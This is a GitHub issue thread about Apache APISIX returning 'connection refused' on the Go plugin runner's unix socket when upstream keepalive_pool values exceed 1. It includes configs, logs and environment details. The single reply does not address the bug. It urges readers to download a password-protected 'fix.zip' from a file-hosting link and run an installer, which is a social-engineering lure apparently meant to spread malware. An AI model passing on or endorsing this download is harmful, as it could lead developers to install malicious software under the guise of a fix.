### ISSUE TITLE
bug: 49#49: *1704858 connect() to unix:/usr/local/apisix/conf/apisix-1.sock failed (111: Connection refused)

### ISSUE THREAD

**Issue by ali-mahdavi-mehr** [apache/apisix#11540]
### Current Behavior

upstream config:
```json
{
  "nodes": [
    {
      "host": "*",
      "port": 80,
      "weight": 1
    }
  ],
  "timeout": {
    "connect": 20,
    "send": 20,
    "read": 20
  },
  "type": "roundrobin",
  "scheme": "http",
  "pass_host": "pass",
  "name": "*",
  "keepalive_pool": {
    "idle_timeout": 60,
    "requests": 50,
    "size": 60
  }
}
```
and below image is the results:
![image](https://github.com/user-attachments/assets/d306e603-8de1-4c8d-9cd9-8b7c47ad9821)

we found that keepalive_pool has a direct effect on errors that we got.
when 
``` json
"keepalive_pool": {
    "idle_timeout": 60,
    "requests": 1,
    "size": 1
  }
```
everything is normal, but when we put `size` or `request` in any number greater than 1 50-60 percent of requests fail.

First, I want to know what these parameters mean And how much they should have on 100  TPS?

runner config:
ext-plugin:
  cmd: ["/plugins/go-runner", "run"]
  

### Expected Behavior

Which configurations should be set on keepalive_pool on TPS 100?

### Error Logs

bug: Throw 2024/08/29 13:50:42 [error] 49#49: *1704858 connect() to unix:/usr/local/apisix/conf/apisix-1.sock failed (111: Connection refused), client: *, server: _, request: "POST /* HTTP/1.1", host: "*"
2024/08/29 13:50:42 [error] 49#49: *1704858 [lua] init.lua:891: communicate(): failed to connect to the unix socket unix:/usr/local/apisix/conf/apisix-1.sock: connection refused, client: *, server: _, request: "POST /* HTTP/1.1", host: "*"

### Steps to Reproduce

1- Run On k8s
2- set the upstream configs like :```
keepalive_pool": {
    "idle_timeout": 60,
    "requests": 50,
    "size": 60
  }
```
3- send request with TPS 10

### Environment

- APISIX version : 3.8.0
- Operating system : UBUNTU
- OpenResty / Nginx version : openresty/1.21.4.2
- Plugin runner version, for issues related to plugin runners: Go Plugin Runner 0.5.0

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."
